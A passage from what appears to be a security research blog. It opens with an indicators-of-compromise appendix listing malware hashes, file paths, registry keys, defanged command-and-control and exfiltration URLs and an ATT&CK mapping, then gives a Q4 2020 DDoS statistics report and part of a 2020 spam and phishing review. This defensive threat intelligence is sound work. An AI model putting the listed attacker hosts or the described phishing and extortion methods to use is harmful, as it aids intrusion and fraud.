ed627b7bbf7ea78c343e9fb99783c62b   1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin fa9635b479a79a3e3fba3d9e65b842c3   3758bda17b20010ff864575b0ccd9e50 %SYSTEMROOT%\system\mraudio.drv cbcf15e272c422b029fcf1b82709e333 %SYSTEMROOT%\system\mraudio.drv 9cb513684f1024bea912e539e482473a   36ab0902797bd18acd6880040369731c %SYSTEMROOT%\LogonHours.sys db35391857bcf7b0fa17dbbed97ad269 %ALLUSERSPROFILE%\Adobe\update.tmp be4c927f636d2ae88a1e0786551bf3c4 %ALLUSERSPROFILE%\Adobe\unpack.tmp 728948c66582858f6a3d3136c7fbe84a %APPDATA%\Microsoft\IBM.DAT 06af39b9954dfe9ac5e4ec397a3003fb   29c5eb3f17273383782c716754a3025a   79d58b6e850647024fea1c53e997a3f6   e604185ee40264da4b7d10fdb6c7ab5e   2a73d232334e9956d5b712cc74e01753   1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin 459be1d21a026d5ac3580888c8239b07 %ALLUSERSPROFILE%\ntuser.bin 87fb7be83eff9bea0d6cc95d68865564 %SYSTEMROOT%\SysWOW64\wmdmpmsp.sys 062a40e74f8033138d19aa94f0d0ed6e %APPDATA%\microsoft\OutIook.db 9b17f0db7aeff5d479eaee8056b9ac09 %TEMP%\ETS4658.tmp, %APPDATA%\Temp\BTM0345.tmp 9b17f0db7aeff5d479eaee8056b9ac09 %APPDATA%\Temp\BTM0345.tmp 420d91db69b83ac9ca3be23f6b3a620b   238e31b562418c236ed1a0445016117c %APPDATA%\Microsoft\Windows\lconcaches.db, %TEMP%\cache.db 36ab0902797bd18acd6880040369731c   238e31b562418c236ed1a0445016117c %TEMP%\cache.db, %APPDATA%\Microsoft\Windows\lconcaches.db ad1a93d6e6b8a4f6956186c213494d17 %APPDATA%\Microsoft\Windows\shsvcs.db c34d5d2cc857b6ee9038d8bb107800f1  

Registry Loader

16824dfd4a380699f3841a6fa7e52c6d   aa74ed16b0057b31c835a5ef8a105942   85621411e4c80897c588b5df53d26270 %SYSTEMROOT%\system\avimovie.dll a611d023dfdd7ca1fab07f976d2b6629   160d0e396bf8ec87930a5df46469a960 %WINDIR%\winhelp.dll 110e1c46fd9a39a1c86292487994e5bd  

Downloader

ac86d95e959452d189e30fa6ded05069 %APPDATA%\Microsoft\thumbnails.db

Trojanized VNC Uploader

bea90d0ef40a657cb291d25c4573768d %ALLUSERSPROFILE%\adobe\arm86.dat 254a7a0c1db2bea788ca826f4b5bf51a %APPDATA%\PBL\user.tmp, %APPDATA%\Comms\Comms.dat

Tunneling Tool

6f0c7cbd57439e391c93a2101f958ccd %APPDATA\PBL\update.tmp fc9e7dc13ce7edc590ef7dfce12fe017  

LPEClient

0aceeb2d38fe8b5ef2899dd6b80bfc08 %TEMP%\ETS5659.tmp 09580ea6f1fe941f1984b4e1e442e0a5 %TEMP%\ETS4658.tmp

File path
%SYSTEMROOT%\system32\bcdbootinfo.tlp
%SYSTEMROOT%\system32\Nwsapagent.sys
%SYSTEMROOT%\system32\SRService.sys
%SYSTEMROOT%\system32\NWCWorkstation.sys
%SYSTEMROOT%\system32\WmdmPmSp.sys
%SYSTEMROOT%\system32\PCAudit.sys
%SYSTEMROOT%\system32\helpsvc.sys

Registry Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig – SubVersion

Domains and IPs
hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php
hxxp://www.au-pair[.]org/admin/Newspaper[.]asp
hxxp://www.au-pair[.]org/admin/login[.]asp
hxxp://www.colasprint[.]com/_vti_log/upload[.]asp
hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp
hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp
hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp
hxxp://www.sanatoliacare[.]com/include/index[.]asp
hxxps://americanhotboats[.]com/forums/core/cache/index[.]php
hxxps://docentfx[.]com/wp-admin/includes/upload[.]php
hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php
hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php
hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php
hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp
hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp
hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php
hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp
hxxps://www.curiofirenze[.]com/include/inc-site[.]asp
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.dronerc[.]it/forum/uploads/index[.]php
hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php
hxxps://www.edujikim[.]com/intro/blue/view[.]asp
hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp
hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp
hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp
hxxps://www.fabioluciani[.]com/es/include/include[.]asp
hxxp://www.juvillage.co[.]kr/img/upload[.]asp
hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp
hxxps://www.lyzeum[.]com/images/board/upload[.]asp
hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php
hxxps://www.polyboatowners[.]com/css/index[.]php
hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp
hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php
hxxp://156.245.16[.]55/admin/admin[.]asp
hxxp://fredrikarnell[.]com/marocko2014/index[.]php
hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp

Second stage C2 address
hxxps://www.waterdoblog[.]com/uploads/index[.]asp
hxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]asp

C2 URLs to exfiltrate files used by Trojanized VNC Uploader
hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php
hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php
hxxps://mdim.in[.]ua:443/core/cache/index[.]php
hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php
hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp
hxxps://www.dellarocca[.]net/it/content/img/img[.]asp
hxxps://www.astedams[.]it/photos/image/image[.]asp
hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php
hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp

Appendix II – MITRE ATT&CK Mapping Tactic Technique Technique Name Initial Access T1566.002 Phishing: Spearphishing Link Execution T1059.003
T1204.002
T1569.002 Command and Scripting Interpreter: Windows Command Shell
User Execution: Malicious File
System Services: Service Execution Persistence T1543.003
T1547.001 Create or Modify System Process: Windows Service
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Privilege Escalation T1543.003 Create or Modify System Process: Windows Service Defense Evasion T1140
T1070.002
T1070.003
T1070.004
T1036.003
T1036.004
T1112 Deobfuscate/Decode Files or Information
Clear Linux or Mac System Logs
Clear Command History
File Deletion
Masquerading: Rename System Utilities
Masquerading: Masquerade Task or Service
Modify Registry Credential Access T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay Discovery T1135
T1057
T1016
T1033
T1049
T1082
T1083
T1007 Network Share Discovery
Process Discovery
System Network Configuration Discovery
System Owner/User Discovery
System Network Connections Discovery
System Information Discovery
File and Directory Discovery
System Service Discovery Lateral Movement T1021.002 SMB/Windows Admin Shares Collection T1560.001 Archive Collected Data: Archive via Utility Command and Control T1071.001
T1132.002
T1104
T1572
T1090.001 Application Layer Protocol: Web Protocols
Non-Standard Encoding
Multi-Stage Channels
Protocol Tunneling
Internal Proxy Exfiltration T1041 Exfiltration Over C2 Channel
2021. február 16.

DDoS attacks in Q4 2020

News overview

Cybercriminals are constantly on the lookout for means and methods to make attacks more destructive. In Q4 2020, Citrix ADC (application delivery controller) devices became one such tool, when perpetrators abused their DTLS interface. The DTLS (Datagram Transport Layer Security) protocol is used to establish secure connections over UDP, through which most DNS queries, as well as audio and video traffic, are sent. To amplify the attack, the attackers sent requests to devices with the DTLS interface enabled, spoofing victims’ IP addresses. Consequently, the victims received reply packets several times larger in size. In the case of Citrix devices, the amount of junk traffic could increase by up to 36 times. After the attacks came to light, the manufacturer promptly released a firmware update for configuring verification of incoming requests. For those who do not use DTLS, it is recommended to simply disable this protocol.

Another notable attack in December targeted the website Bitcoin.org, which hosts Bitcoin Core, one of the most widely used software versions of bitcoin. While the resource was down, cryptocurrency newbies were invited to download a copy of Bitcoin Core via a torrenting service. Most likely, the attack is related to the bitcoin price, which has steadily risen over the past quarter. According to one of the developers behind Bitcoin.org, the site is always hit whenever bitcoin is on the up.

Overall, Q4 remained within the parameters of 2020 trends. Cybercriminals used the names of well-known APT groups to intimidate victims, demanded ransoms in cryptocurrency, and carried out demonstration attacks to back up their threats. Extortionists’ activity regularly made the news throughout 2020. In October, telecommunications firm Telenor Norway was another to fall victim.

Since the transition of schools and universities to remote learning, cybercriminals have tried to disrupt classes by flooding educational platforms with garbage traffic. This trend continued in the last months of 2020. In October, schools in Sandwich and Tyngsboro, Massachusetts, suffered network outages. In both cases, the institutions initially put the incident down to technical failure, and only later discovered the attack. In December, Canada’s Laurentian University reported a DDoS attack. But it dealt with the problem in a matter of minutes. Still, such attacks by year’s end were serious enough for the FBI to flag them in its December advisory as a major threat to teaching facilities. Educational institutions are recommended to use anti-DDoS solutions and strong firewall settings, and partner up with ISPs.

Gaming platforms didn’t escape cybercriminal attention either. According to ZDNet, Xbox and Steam were the targets of amplification attacks through Citrix devices. In early October, a DDoS attack was reported by the PUBG Mobile team.

Dear players,

The PUBG MOBILE team are currently actively working to resolve the DDoS attacks against our systems and the new hacking issues. For information, please check out here: https://t.co/DMYsxWTlCc

— PUBG MOBILE (@PUBGMOBILE) October 3, 2020

And Blizzard’s European servers were hit by threat actors twice in the quarter.

We are currently experiencing a DDoS attack, which may result in high latency and disconnections for some players. We are actively working to mitigate this issue #BlizzCS

— Blizzard CS EU (@BlizzardCSEU_EN) October 2, 2020

In late December, several dozen top streamers planned to celebrate the end of 2020 playing through Rust all on the same server. The show failed at the first attempt, apparently due to a DDoS attack, although there is no reliable data on this. Given the hype surrounding the event, it may have been caused by an influx of fans tuning in. In 2020, when much of life shifted online, internet resources repeatedly suffered from surges in totally legitimate activity.

As for the fightback, the most notable Q4 event was the conviction of a former Apophis Squad member responsible for a string of DDoS attacks, including for ransom, as well as for disrupting school classes worldwide through fake bomb alerts, and for storing child pornography. For his efforts, the perpetrator was sentenced to eight years in prison.

The resistance against individual attack vectors also continues. The Internet Engineering Task Force (IETF) published a proposal for Network Time Security (NTS), a secure standard for data transmission over the Network Time Protocol (NTP), which is used to synchronize time across a network. The document addresses, in particular, the problem of DDoS amplification through this protocol and prohibits the sending, in response to a request, of data packets larger than the request packet.

Quarter and year trends

This time, our forecasts came true exactly 50%: as expected, in Q4 2020 we observed indicators comparable to those for the same period in 2019, and even slightly higher. However, growth relative to Q3 2020, which we predicted as a possible alternative, did not occur. On the contrary, the total number of attacks fell by about 30%, and smart attacks by 10%.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Comparative number of DDoS attacks, Q3/Q4 2020 and Q4 2019; data for Q4 2019 is taken as 100% (download)

All the same, the qualitative indicators are noteworthy: the share of smart attacks increased slightly in Q4, and the data on attack duration showed a downward trend for short attacks and an upward trend for long ones.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of smart attacks, Q3/Q4 2020 and Q4 2019 (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Duration of DDoS attacks, Q3/Q4 2020 and Q4 2019; data for Q4 2019 is taken as 100% (download)

The drop in the number of DDoS attacks can be explained by growth in the cryptocurrency market. We already mentioned several times, including in the previous report, the inverse relationship between DDoS activity and the price of cryptocurrencies. When we made our Q4 forecasts, hardly anyone expected such rapid, frankly unprecedented growth. Unsurprisingly, then, botnet operators turned some of their capacity over to mining.

Interestingly, the noticeable fall in the number of DDoS attacks compared to the previous quarter came at the expense of easy-to-organize attacks, while smart attacks declined only insignificantly. This is perfectly logical: it is unprofitable for botnet operators to sell capacity on the cheap, losing out on mining profits; so when prices rise, the first to be cut loose are amateurs — schoolkids, prankers, hotheads — who have no real reason to organize a DDoS. As for professionals, their interests are undented by market fluctuations, especially in Q4 with its many holidays and online sales, so they continue to order and carry out attacks, and mostly smart ones, because they are focused on the result, not the attempt.

What Q1 2021 will bring is hard to say. However, we are becoming increasingly convinced that the DDoS market has stopped growing, having completely stabilized after the decline in 2018. The current fluctuations are mainly due to the dynamics of cryptocurrency prices, and will depend directly on them going forward. If cryptocurrencies begin to fall in price in Q1 2021, the number of DDoS attacks will rise, and vice versa. At the same time, we do not expect to see any explosive growth or dramatic fall. Barring the unexpected (although the unexpected was the name of the game last year), DDoS market fluctuations will remain within 30%.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Comparative number of DDoS attacks, 2019 and 2020; data for 2019 is taken as 100% (download)

As for the results of 2020 as a whole, the market slightly less than doubled over the year. Note that this growth is purely quantitative: the share of smart attacks remained practically unchanged.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of smart attacks, 2019 and 2020 (download)

The attack duration data is of particular interest. In 2020, the average duration decreased by roughly a third, while the maximum increased noticeably overall, despite remaining almost on a par with last year in the case of smart attacks. This suggests that short attacks are getting shorter and long ones longer; we saw a similar trend in Q4. Although the reasons are hard to pinpoint, we can assume, as with every other trend last year, that it is related to the pandemic, the serious global instability and the eruptive growth in the cryptocurrency market. The DDoS market is changing under the influence of these factors, as too are the targets of attacks and those who order them, and with them the average attack duration.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Duration of DDoS attacks, 2019 and 2020; data for 2019 is taken as 100% (download)

Statistics Methodology

Kaspersky has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q4 2020.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Note that Q4 2020 saw a rise in the number of botnets whose activity is included in the DDoS Intelligence statistics. This may be reflected in the data presented in this report.

Quarter summary
  • In Q4, as before, China (58.95%), the US (20.98%) and Hong Kong (3.55%) led the pack by number of DDoS attacks.
  • Ditto the TOP 3 regions by number of targets: China (44.49%), the US (23.57%) and Hong Kong (7.20%).
  • On the “quietest” days, the number of DDoS attacks did not exceed one per day.
  • The most active day of the quarter in terms of DDoS was December 31, which recorded 1,349 attacks.
  • The most DDoS attacks this quarter we saw on Thursdays, and the fewest on Sundays.
  • The shares of very short attacks (71.63%) and very long attacks (0.14%) decreased in Q4, while the shares of all intermediate categories increased.
  • Q4 reshuffled the distribution of DDoS attacks by type: UDP flooding returned to second place (15.17%), and GRE flooding, previously unmentioned in our reports, became the fourth most common (0.69%).
  • Linux botnets were used in almost 100% of attacks.
  • The majority of botnet C&C servers were located in the US (36.30%), the Netherlands (19.18%) and Germany (8.22%).
Attack geography

The TOP 3 countries by number of DDoS attacks in Q4 2020 remained the same as in the previous reporting period. China is still top (58.95%), but its share fell by 12.25 p.p. Second place goes to the US (20.98%), whose share, in contrast, climbed by 5.68 p.p. A similar pattern — a decline in China’s and an increase in the US share against Q3 — we also observed in the last three months of 2019.

Despite losing 0.92 p.p., the Hong Kong Special Administrative Region (3.55%) clung on to third place, which it has not vacated since the beginning of 2020. This is where the similarity with the Q3 picture ends: Singapore, fourth in the last reporting period, dropped out of the TOP 10. It was replaced by the UK (1.99%), which gained 1.72 p.p.

The fifth line is occupied by South Africa (1.31%), displacing Australia (0.97%), which dropped to seventh, despite increasing its share by 0.32 p.p.; Canada (1.04%) ranked sixth after missing out on the TOP 10 in Q3.

The Netherlands moved down one position to eighth (0.86%). India and Vietnam, like Singapore, left the TOP 10. The ranking is rounded out by Germany (0.71%) and France (0.64%), which both fell short of the Q3 TOP 10.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by country, Q3 and Q4 2020 (download)

The TOP 10 countries list by number of DDoS targets is traditionally similar to the ranking by number of attacks. The three leaders are the same: ahead is China (44.49%), whose share decreased by 28.34 p.p., but remains unchallenged. Second is the US (23.57%), whose share increased by 7.82 p.p., and in third place is Hong Kong, adding 7.20%.

South Africa failed to make the TOP 10 by number of targets, but not Singapore (2.21%), despite dropping out of the ranking by number of attacks. While its share increased by 1.74 p.p., it lost ground relative to Q3 and moved down to fifth place. This is because all the TOP 10 countries, except China, increased their share. For instance, the fourth-placed Netherlands (4.34%) grew by 4.07 p.p.

As for countries lower down, only their order of appearance distinguishes this list from the ranking by number of attacks. Canada (1.97%) outstrips the UK (1.77%), while Australia (1.29%) places last, behind France (1.73%) and Germany (1.62%).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2020 (download)

Dynamics of the number of DDoS attacks

As expected, Q4 was more turbulent than its predecessor. The start of the reporting period was quite calm: on October 3–6, we observed only one attack per day. However, come October 20, 347 attacks were recorded, which exceeds the Q3 maximum (323 attacks in one day). In late October and November, DDoS activity fluctuated between close to zero and 200 attacks per day.

The last days of November saw the start of significant growth, which continued through quarter’s end, most likely due to the increase in the number of botnets monitored by Kaspersky, as well as the Christmas and New Year vacations, the runup to which is usually accompanied by a spike in cybercriminal activity. The overall rise in online shopping (holiday-related and other) probably also played a role. The hottest day in terms of DDoS this quarter was December 31, with 1,349 attacks recorded worldwide.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Dynamics of the number of DDoS attacks, Q4 2020 (download)

In Q4, Thursday remained the most active day of the week (17.67%), although its share dropped by 1.35 p.p. against the previous quarter. But the title of quietest day changed hands again: this time, cybercriminals preferred to put their feet up on Sundays (11.19%). What’s more, the spread in the number of attacks on “calm” and “stormy” days narrowed to 6.48 p.p., down from almost 9 p.p. last quarter. In the last three months of the year, the number of attacks conducted on Tuesdays, Wednesdays and Fridays increased, and for other weekdays, decreased.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by day of the week, Q3 and Q4 2020 (download)

Duration and types of DDoS attacks

The average duration of DDoS attacks in Q4 increased relative to the previous reporting period. This can be attributed to the significant decline in the share of very short attacks lasting under four hours (71.62% versus 91.06% in Q3), as well as the increase in the number of longer attacks. Specifically, the share of attacks lasting 5–9 (11.78%), 10–19 (8.40%), 20–49 (6.10%), 50–99 (1.86%) and 100–139 (0.10%) hours increased this quarter.

In contrast, the share of ultra-long attacks decreased by 0.09 p.p. to 0.14%, yet remained higher than the share of attacks lasting 100–139 hours, while the duration of the longest attack exceeded 12 days (302 hours), which is noticeably longer than the Q3 maximum (246 hours).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2020 (download)

The distribution of DDoS attacks by type changed dramatically in Q4. The lead is still held by SYN flooding, but its share fell by 16.31 p.p. to 78.28%. Meanwhile, the share of UDP flooding shot up (15.17%), having been under 2% in the first three quarters. TCP attacks (5.47%) also increased in number, but ICMP flooding, previously ranked second after SYN attacks, was negligible in Q4, so we did not include it in the statistics.

Instead, a type of attack previously unmentioned in our reports, GRE flooding (0.69%), showed up on the Q4 radar. GRE (Generic Routing Encapsulation) is a traffic-tunneling protocol used primarily for creating virtual private networks (VPNs). GRE flooding was employed, for instance, by the Mirai botnet to attack the blog of journalist Brian Krebs in 2016.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by type, Q4 2020 (download)

This quarter, for the first time since our observations began, the share of Windows botnets fell to almost zero (0.20%). Almost all recorded DDoS attacks were carried out using Linux-based bots.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Ratio of Windows/Linux botnet attacks, Q3 and Q4 2020 (download)

Botnet distribution by country

The bulk of C&C servers in control of DDoS botnets in Q4 2020 were located in the US, which accounted for 36.30% of the total number of servers. In second place was the Netherlands with a 19.18% slice. Germany completes the TOP 3 with 8.22%.

Romania came fourth by number of C&C servers (4.79%), while fifth and sixth positions were shared by France and the UK, both on 4.11%. This quarter’s seventh-, eighth- and ninth-ranking countries likewise had the same share: Canada, Hungary and Vietnam all posted 3.42%. China (2.05%) wraps up the TOP 10 countries by number of recorded botnet C&C servers.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of botnet C&C servers by country, Q4 2020 (download)

Conclusion

Q4 was both ordinary and extraordinary. On the one hand, there were no unexpected changes in the geographical distribution of DDoS attacks and targets; on the other, the distribution by attack type shifted radically: the share of UDP flooding was up; ICMP attacks were displaced by GRE flooding. In addition, for the first time in our observation history, Linux botnets have almost totally captured the DDoS market.

We would very much like to see the data for an alternative 2020 — one with no pandemic, no dramatic cryptocurrency growth, no shocks to the DDoS market. The coronavirus outbreak spurred the market (see our Q1 and Q2 reports), while the cryptocurrency upswing curbed it (see our Q3 report). Perhaps these opposing forces ultimately canceled each other out, and the picture would have been similar without them, but in 2020 they combined to create a perfect storm on the DDoS market, blowing half of our predictions off course.

It is hard to guess what to expect in 2021 — we cannot predict how the pandemic or cryptocurrency prices will behave. Therefore, our forecast is very tentative: no sharp shocks will equal little change on the DDoS market. We see no preconditions for major growth or decline, both in Q1 and throughout 2021. The watchword is stability, which is what we expect.

2021. február 15.

Spam and phishing in 2020

Figures of the year

In 2020:

  • The share of spam in email traffic amounted to 50.37%, down by 6.14 p.p. from 2019.
  • Most spam (21.27%) originated in Russia.
  • Kaspersky solutions detected a total of 184,435,643 malicious attachments.
  • The email antivirus was triggered most frequently by email messages containing members of the Trojan.Win32.Agentb malware family.
  • The Kaspersky Anti-Phishing component blocked 434,898,635 attempts at accessing scam sites.
  • The most frequent targets of phishing attacks were online stores (18.12 per cent).
Trends of the year Contact us to lose your money or account!

In their email campaigns, scammers who imitated major companies, such as Amazon, PayPal, Microsoft, etc., increasingly tried to get users to contact them. Various pretexts were given for requesting the user to get in touch with “support”: order confirmation, resolving technical issues, cancellation of a suspicious transaction, etc. All of these messages had one thing in common: the user was requested to call a support number stated in the email. Most legitimate messages give recipients constant warnings of the dangers of opening links that arrive by email. An offer to call back was supposed to put the addressees off their guard. Toll-free numbers were intended to add further credibility, as the support services of large companies often use these. The scammers likely expected their targets to use the provided phone number to get help instantly in a critical situation, rather than to look for a contact number or wait for a written response from support.

The contact phone trick was heavily used both in email messages and on phishing pages. The scammers were simply betting on the visitor to turn their attention to the number and unsettling warning message against the red background, rather than the address bar of the fake website.

We assume that those who called the numbers were asked to provide the login and password for the service that the scammers were imitating, or to pay for some diagnostics and troubleshooting services.

Reputation, bitcoins or your life?

In 2020, Bitcoin blackmailers stuck to their old scheme, demanding that their victims transfer money to a certain account and threatening adversity for failure to meet their demands. Threats made by extortionists grew in diversity. In most cases, scammers, as before, claimed to have used spyware to film the blackmail victim watching adult videos. In a reflection of the current trends for online videoconferencing, some email campaigns claimed to have spied on their victims with the help of Zoom. This year, too, blackmailers began to take advantage of news sensations to add substance to their threats. This is very similar to the techniques of “Nigerian” scammers, who pose as real political figures or their relatives, offering tons of money, or otherwise link their messages with concurrent global events. In the case of bitcoin blackmail, the media component was supposed to be a strong argument in the eyes of the victim for paying the ransom without delay, so cybercriminals cited the example of media personalities whose reputation suffered because of an explicit video being published.

This year, we have seen threats made against companies, too. A company was told to transfer a certain amount to a Bitcoin wallet to prevent a DDoS attack that the cybercriminals threatened to unleash upon it. They promised to provide a demonstration to prove that their threats were real: no one would be able to use the services, websites or email of the company under attack for thirty minutes. Interestingly, the cybercriminals did not limit their threats to DDoS. As with blackmail aimed at individuals, they promised to damage the company’s reputation even more, should it fail to pay up, by stealing confidential information, specifically, its business data. The attackers introduced themselves as well-known APT groups to add weight to their threats. For example, in the screenshot below, they call themselves Venomous Bear, also known as Waterbug or Turla.

The senders of an email that talked about a bomb planted in company’s offices went much further with their threats. The amount demanded by the blackmailers was much larger than in previous messages: $20,000. To make their threats sound convincing enough, the cybercriminals provided details of the “attack”: an intention to blow up the bomb if the police intervened, the substance used, the explosive yield and plans to threaten other blackmail victims with the explosion.

Attacks on the corporate sector

Theft of work accounts and infecting of office computers with malware in targeted attacks are the main risk that companies have faced this year. Messages that imitated business email or notifications from major services offered to view a linked document or attached HTML page. Viewing the file required entering the password to the recipient’s corporate email account.

Reasons given for asking users to open a link or attachment could be varied: a need to install an update, unread mail, quarantined mail or unread chat messages. The cybercriminals created web pages that were designed to look like they belonged to the company under attack. URL parameters including the corporate email address were pushed to the fake page with the help of JavaScript. This resulted in the user seeing a unique page with a pre-entered email address and a design generated to imitate the company’s corporate style. The appearance of that page could lull the potential victim into a false sense of security, as all they needed to do was enter their password.

During this type of attacks scammers began to make broader use of “voice messaging”. The appearance of the messages imitated business email.

The link could lead directly to a phishing site, but there also was a more complex scenario, in which the linked page looked like an audio player. When the recipient tried playing the file, they were asked to enter the credentials for their corporate mailbox.

